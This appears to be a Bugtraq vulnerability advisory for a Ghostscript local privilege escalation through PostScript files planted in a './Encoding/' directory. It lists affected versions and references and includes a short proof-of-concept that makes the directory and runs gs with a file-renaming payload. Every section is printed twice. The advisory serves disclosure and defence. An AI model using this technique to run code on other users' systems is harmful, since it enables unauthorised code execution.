Ghostscript './Encoding/' Search Path Local Privilege Escalation Vulnerability
BID:40369
Info
Ghostscript './Encoding/' Search Path Local Privilege Escalation Vulnerability
| Bugtraq ID: | 40369 |
| Class: | Design Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | May 22 2010 12:00AM |
| Updated: | May 31 2010 10:30PM |
| Credit: | Christopher Yeleighton |
| Vulnerable: |
Ghostscript Ghostscript 8.15.2 Ghostscript Ghostscript 8.0.1 Ghostscript Ghostscript 5.50 Ghostscript Ghostscript 8.64 Ghostscript Ghostscript 8.61 Ghostscript Ghostscript 8.60 Ghostscript Ghostscript 8.57 Ghostscript Ghostscript 8.56 Ghostscript Ghostscript 8.54 Ghostscript Ghostscript 8.15 Ghostscript Ghostscript 7.07 Ghostscript Ghostscript 7.05 Ghostscript Ghostscript 0 |
| Not Vulnerable: | |
Discussion
Ghostscript './Encoding/' Search Path Local Privilege Escalation Vulnerability
Ghostscript is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to execute arbitrary code with the privileges of the user running the application.
Ghostscript 8.64 is vulnerable; other versions may also be affected.
Ghostscript is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to execute arbitrary code with the privileges of the user running the application.
Ghostscript 8.64 is vulnerable; other versions may also be affected.
Exploit / POC
Ghostscript './Encoding/' Search Path Local Privilege Escalation Vulnerability
An attacker can exploit this issue by enticing an unsuspecting user to run the application from the directory where a malicious file is stored.
The following proof-of-concept is available:
mkdir Encoding
echo '(PWND BY ARTIFEX HAXORZ\n) print (test.ps) (pwnd.ps) renamefile quit'
gs
An attacker can exploit this issue by enticing an unsuspecting user to run the application from the directory where a malicious file is stored.
The following proof-of-concept is available:
mkdir Encoding
echo '(PWND BY ARTIFEX HAXORZ\n) print (test.ps) (pwnd.ps) renamefile quit'
gs
Solution / Fix
Ghostscript './Encoding/' Search Path Local Privilege Escalation Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Ghostscript './Encoding/' Search Path Local Privilege Escalation Vulnerability
References:
References:
- Bug 691350 - gs_init.ps tried in current dir despite -P- (Paul Szabo)
- #583316 /usr/bin/gv: Insecure gs workaround "gs -P-" (Paul Szabo)
- Bug 608071 - Ghostscript executes random code on startup (Christopher Yeleighton)
- Bug 691316 - { /ISOLatin2Encoding findencoding } fails (Christopher Yeleighton)
- Bug 691339 - Insecure gs initialization (Paul Szabo)
- Ghostscript Homepage (Ghostscript)
- Ghostscript 8.64 executes random code at startup ([email protected])
- Re: Ghostscript 8.64 executes random code at startup ([email protected])
- Re: Ghostscript 8.64 executes random code at startup (Krzysztof Zelechowski
) - Re: Ghostscript 8.64 executes random code at startup ([email protected])
- Re: Ghostscript 8.64 executes random code at startup ([email protected])